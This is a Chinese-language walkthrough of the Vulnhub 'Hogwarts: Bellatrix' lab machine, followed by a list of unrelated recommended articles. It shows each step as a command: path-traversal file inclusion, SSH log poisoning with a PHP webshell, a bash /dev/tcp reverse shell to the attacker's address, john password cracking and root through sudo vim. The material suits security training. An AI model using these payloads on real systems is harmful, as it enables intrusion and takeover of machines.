Vulnhub: Hogwarts: Bellatrix靶机

kali:192.168.111.111

靶机:192.168.111.228

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228

访问80端口

查看源码,提示ikilledsiriusblack.php和文件包含的参数名file

漏洞利用

ikilledsiriusblack.php存在文件包含

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../etc/passwd

可以包含ssh日志文件/var/log/auth.log

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log

写入webshell到ssh日志文件

复制代码
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.228

执行命令

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log&cmd=id

执行反弹shell

复制代码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

/var/www/html/c2VjcmV0cw==目录中发现密码字典和lestrange的密码密文

利用john爆破密文,密码:ihateharrypotter

复制代码
john hash --wordlist=./pass.txt

lestrange用户sudo权限

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

提升为root

复制代码
sudo -u root vim -c ':!/bin/bash'

flag

相关推荐
Chuer_10 分钟前
AI For BI是什么?一文拆解AI For BI应用落地!
大数据·数据库·人工智能·安全·数据分析·甘特图
安当加密16 分钟前
指纹一按,安全上线:指纹登录如何为生产线 Windows 电脑实现低成本防勒索?
windows·安全·电脑
数字供应链安全产品选型19 分钟前
2026 年 5 月前瞻:智能体安全合规新要求,悬镜灵境 AIDR 护航 Hermes Agent 合规落地
安全
不做超级小白20 分钟前
解密Win11的Win+S搜索:从索引原理到自启动的攻防战
windows·安全
EasyDSS20 分钟前
私有化视频会议系统/私有化音视频系统EasyDSS如何构建金融行业视频会议安全技术底座
安全·金融·音视频
星纵物联22 分钟前
智能电力监测终端,让用电更安全、更高效、更省心!
安全
源图客26 分钟前
软件上线安全-漏扫报告
安全
VBsemi-专注于MOSFET研发定制37 分钟前
协作机器人螺丝锁付系统功率MOSFET选型方案——高效、精准与安全驱动系统设计指南
单片机·安全·机器人
PinTrust SSL证书1 小时前
Sectigo(Comodo)域名型DV通配符SSL
网络·网络协议·http·网络安全·https·软件工程·ssl
Dola_Zou1 小时前
授权管理如何重塑工业软件的商业版图
安全·自动化·软件工程·软件加密